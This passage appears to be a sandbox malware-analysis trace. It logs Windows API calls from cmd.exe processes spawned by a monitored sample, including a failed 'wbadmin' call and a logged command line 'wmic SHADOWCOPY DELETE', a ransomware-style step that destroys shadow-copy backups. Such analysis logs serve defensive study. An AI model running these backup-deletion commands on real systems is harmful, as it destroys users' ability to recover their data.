lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.921] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef490, lpFilePart=0x2ef48c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef48c*="Desktop") returned 0x25 [0076.921] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.922] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef20c | out: lpFindFileData=0x2ef20c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4c1f00 [0076.922] FindClose (in: hFindFile=0x4c1f00 | out: hFindFile=0x4c1f00) returned 1 [0076.922] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef20c | out: lpFindFileData=0x2ef20c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4c1f00 [0076.922] FindClose (in: hFindFile=0x4c1f00 | out: hFindFile=0x4c1f00) returned 1 [0076.922] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0076.922] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef20c | out: lpFindFileData=0x2ef20c*(dwFileAttributes=0x11, 
ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe392fd80, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xe392fd80, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4c1f00 [0076.922] FindClose (in: hFindFile=0x4c1f00 | out: hFindFile=0x4c1f00) returned 1 [0076.922] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.922] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0076.922] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0076.922] GetProcessHeap () returned 0x4b0000 [0076.922] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4bf8 | out: hHeap=0x4b0000) returned 1 [0076.922] GetEnvironmentStringsW () returned 0x4c4108* [0076.923] GetProcessHeap () returned 0x4b0000 [0076.923] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xb36) returned 0x4c5f48 [0076.923] FreeEnvironmentStringsW (penv=0x4c4108) returned 1 [0076.923] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.923] GetProcessHeap () returned 0x4b0000 [0076.923] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c56e8 | out: hHeap=0x4b0000) returned 1 [0076.923] GetProcessHeap () returned 0x4b0000 [0076.923] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x400e) returned 0x4c6a88 [0076.923] GetProcessHeap () returned 0x4b0000 [0076.923] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x6e) returned 0x4c2dd8 [0076.923] GetProcessHeap () returned 0x4b0000 [0076.923] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c6a88 | out: 
hHeap=0x4b0000) returned 1 [0076.923] GetConsoleOutputCP () returned 0x1b5 [0076.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.924] GetUserDefaultLCID () returned 0x409 [0076.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a824950, cchData=8 | out: lpLCData=":") returned 2 [0076.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef5d0, cchData=128 | out: lpLCData="0") returned 2 [0076.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef5d0, cchData=128 | out: lpLCData="0") returned 2 [0076.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef5d0, cchData=128 | out: lpLCData="1") returned 2 [0076.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a824940, cchData=8 | out: lpLCData="/") returned 2 [0076.924] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a824d80, cchData=32 | out: lpLCData="Mon") returned 4 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a824d40, cchData=32 | out: lpLCData="Tue") returned 4 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a824d00, cchData=32 | out: lpLCData="Wed") returned 4 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a824cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a824c80, cchData=32 | out: lpLCData="Fri") returned 4 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a824c40, cchData=32 | out: lpLCData="Sat") returned 4 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a824c00, cchData=32 | out: lpLCData="Sun") returned 4 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a824930, cchData=8 | out: lpLCData=".") returned 2 [0076.925] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a824920, cchData=8 | out: lpLCData=",") returned 2 [0076.925] setlocale (category=0, locale=".OCP") 
returned="English_United States.437" [0076.926] GetProcessHeap () returned 0x4b0000 [0076.926] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x0, Size=0x20c) returned 0x4c2e50 [0076.926] GetConsoleTitleW (in: lpConsoleTitle=0x4c2e50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0076.926] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.926] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0076.926] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0076.926] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0076.927] GetProcessHeap () returned 0x4b0000 [0076.927] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x400a) returned 0x4c6a88 [0076.927] GetProcessHeap () returned 0x4b0000 [0076.927] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c6a88 | out: hHeap=0x4b0000) returned 1 [0076.927] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0076.928] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0076.928] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0076.928] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0076.928] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0076.928] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0076.928] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0076.928] GetProcessHeap () returned 0x4b0000 [0076.928] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x58) returned 0x4c3068 [0076.928] GetProcessHeap () returned 0x4b0000 [0076.928] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x18) returned 0x4c30c8 [0076.929] GetProcessHeap () returned 0x4b0000 [0076.929] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x5c) returned 0x4c30e8 [0076.930] GetConsoleTitleW (in: lpConsoleTitle=0x2ef2c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") 
returned 0x1b [0076.930] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0076.930] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0076.930] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0076.930] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0076.930] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0076.930] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0076.930] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0076.930] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0076.930] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0076.930] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0076.930] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0076.930] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0076.930] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0076.930] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0076.930] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0076.930] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0076.930] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0076.930] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0076.930] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0076.931] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0076.931] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0076.931] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0076.931] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0076.931] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0076.931] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0076.931] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0076.931] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0076.931] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0076.931] _wcsicmp (_String1="wbadmin", 
_String2="SETLOCAL") returned 4 [0076.931] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0076.931] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0076.931] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0076.931] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0076.931] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0076.931] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0076.931] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0076.931] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0076.931] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0076.931] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0076.931] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0076.931] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0076.931] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0076.931] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0076.931] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0076.931] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0076.931] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0076.931] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0076.931] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0076.931] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0076.931] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0076.931] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0076.932] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0076.932] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0076.932] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0076.932] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0076.932] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0076.932] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 
[0076.932] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0076.932] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0076.932] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0076.932] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0076.932] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0076.932] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0076.932] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0076.932] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0076.932] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0076.932] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0076.932] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0076.932] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0076.932] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0076.932] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0076.932] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0076.932] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0076.932] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0076.932] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0076.932] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0076.932] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0076.932] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0076.932] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0076.932] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0076.932] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0076.932] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0076.932] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0076.932] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0076.932] _wcsicmp (_String1="wbadmin", _String2="FOR") returned 17 [0076.933] _wcsicmp 
(_String1="wbadmin", _String2="IF") returned 14 [0076.933] _wcsicmp (_String1="wbadmin", _String2="REM") returned 5 [0076.933] GetProcessHeap () returned 0x4b0000 [0076.933] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x210) returned 0x4c3150 [0076.933] GetProcessHeap () returned 0x4b0000 [0076.933] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x6c) returned 0x4c3368 [0076.933] _wcsnicmp (_String1="wbad", _String2="cmd ", _MaxCount=0x4) returned 20 [0076.933] GetProcessHeap () returned 0x4b0000 [0076.933] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x418) returned 0x4b07f0 [0076.933] SetErrorMode (uMode=0x0) returned 0x0 [0076.933] SetErrorMode (uMode=0x1) returned 0x0 [0076.933] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4b07f8, lpFilePart=0x2eede8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2eede8*="Desktop") returned 0x25 [0076.934] SetErrorMode (uMode=0x0) returned 0x1 [0076.934] GetProcessHeap () returned 0x4b0000 [0076.934] RtlReAllocateHeap (Heap=0x4b0000, Flags=0x0, Ptr=0x4b07f0, Size=0x64) returned 0x4b07f0 [0076.934] GetProcessHeap () returned 0x4b0000 [0076.934] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4b07f0) returned 0x64 [0076.934] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0076.934] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0076.934] GetProcessHeap () returned 0x4b0000 [0076.934] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x120) returned 0x4c33e0 [0076.934] GetProcessHeap () returned 0x4b0000 [0076.934] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x238) returned 0x4b0860 [0076.941] RtlReAllocateHeap (Heap=0x4b0000, Flags=0x0, Ptr=0x4b0860, Size=0x122) returned 0x4b0860 [0076.941] GetProcessHeap () returned 0x4b0000 [0076.941] 
RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4b0860) returned 0x122 [0076.941] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.941] GetProcessHeap () returned 0x4b0000 [0076.941] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xe0) returned 0x4c3508 [0076.941] RtlReAllocateHeap (Heap=0x4b0000, Flags=0x0, Ptr=0x4c3508, Size=0x76) returned 0x4c3508 [0076.941] GetProcessHeap () returned 0x4b0000 [0076.941] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c3508) returned 0x76 [0076.941] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.942] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0076.942] GetLastError () returned 0x2 [0076.942] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0076.942] GetLastError () returned 0x2 [0076.942] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.942] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0076.942] GetLastError () returned 0x2 [0076.942] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0076.942] GetLastError () returned 0x2 [0076.942] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.943] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0076.943] GetLastError () returned 0x2 [0076.943] FindFirstFileExW (in: lpFileName="C:\\Windows\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0076.943] GetLastError () returned 0x2 [0076.943] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.943] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0077.121] GetLastError () returned 0x2 [0077.121] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0077.122] GetLastError () returned 0x2 [0077.122] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.123] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0077.470] GetLastError () returned 0x2 [0077.470] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0077.471] GetLastError () returned 0x2 [0077.471] _get_osfhandle (_FileHandle=2) returned 0xb [0077.471] GetFileType (hFile=0xb) returned 0x2 [0077.471] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0077.471] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2eefb8 | out: 
lpMode=0x2eefb8) returned 1 [0077.471] _get_osfhandle (_FileHandle=2) returned 0xb [0077.471] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2eefec | out: lpConsoleScreenBufferInfo=0x2eefec) returned 1 [0077.472] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a834640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0077.472] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a834640, nSize=0x2000, Arguments=0x2ef02c | out: lpBuffer="'wbadmin' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0077.472] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a834640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x2ef010, lpReserved=0x0 | out: lpBuffer=0x4a834640*, lpNumberOfCharsWritten=0x2ef010*=0x62) returned 1 [0077.473] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.473] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0077.473] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.473] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0077.473] _get_osfhandle (_FileHandle=0) returned 0x3 [0077.473] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0077.473] SetConsoleInputExeNameW () returned 0x1 [0077.474] GetConsoleOutputCP () returned 0x1b5 [0077.474] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0077.474] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.474] exit (_Code=1) Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x458e6000" os_pid = "0xa4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" 
os_parent_pid = "0x5bc" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c wmic SHADOWCOPY DELETE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 37 os_tid = 0xac8 [0076.740] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x34f9f4 | out: lpSystemTimeAsFileTime=0x34f9f4*(dwLowDateTime=0xf283b280, dwHighDateTime=0x1d61645)) [0076.741] GetCurrentProcessId () returned 0xa4c [0076.741] GetCurrentThreadId () returned 0xac8 [0076.741] GetTickCount () returned 0x11496d4 [0076.741] QueryPerformanceCounter (in: lpPerformanceCount=0x34f9ec | out: lpPerformanceCount=0x34f9ec*=19709534627) returned 1 [0076.742] GetModuleHandleA (lpModuleName=0x0) returned 0x4a800000 [0076.742] __set_app_type (_Type=0x1) [0076.742] __p__fmode () returned 0x770331f4 [0076.742] __p__commode () returned 0x770331fc [0076.743] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8221a6) returned 0x0 [0076.743] __getmainargs (in: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c, _DoWildCard=0, _StartInfo=0x4a824140 | out: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c) returned 0 [0076.743] GetCurrentThreadId () returned 0xac8 [0076.743] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xac8) returned 0x60 [0076.743] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.743] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0076.743] SetThreadUILanguage (LangId=0x0) returned 0x409 [0076.744] HeapSetInformation (HeapHandle=0x0, 
HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0076.744] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x34f984 | out: phkResult=0x34f984*=0x0) returned 0x2 [0076.744] VirtualQuery (in: lpAddress=0x34f9bb, lpBuffer=0x34f954, dwLength=0x1c | out: lpBuffer=0x34f954*(BaseAddress=0x34f000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.744] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x34f954, dwLength=0x1c | out: lpBuffer=0x34f954*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0076.744] VirtualQuery (in: lpAddress=0x251000, lpBuffer=0x34f954, dwLength=0x1c | out: lpBuffer=0x34f954*(BaseAddress=0x251000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0076.744] VirtualQuery (in: lpAddress=0x253000, lpBuffer=0x34f954, dwLength=0x1c | out: lpBuffer=0x34f954*(BaseAddress=0x253000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.744] VirtualQuery (in: lpAddress=0x350000, lpBuffer=0x34f954, dwLength=0x1c | out: lpBuffer=0x34f954*(BaseAddress=0x350000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x100000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0076.744] GetConsoleOutputCP () returned 0x1b5 [0076.744] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.745] SetConsoleCtrlHandler (HandlerRoutine=0x4a81e72a, Add=1) returned 1 [0076.745] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.745] 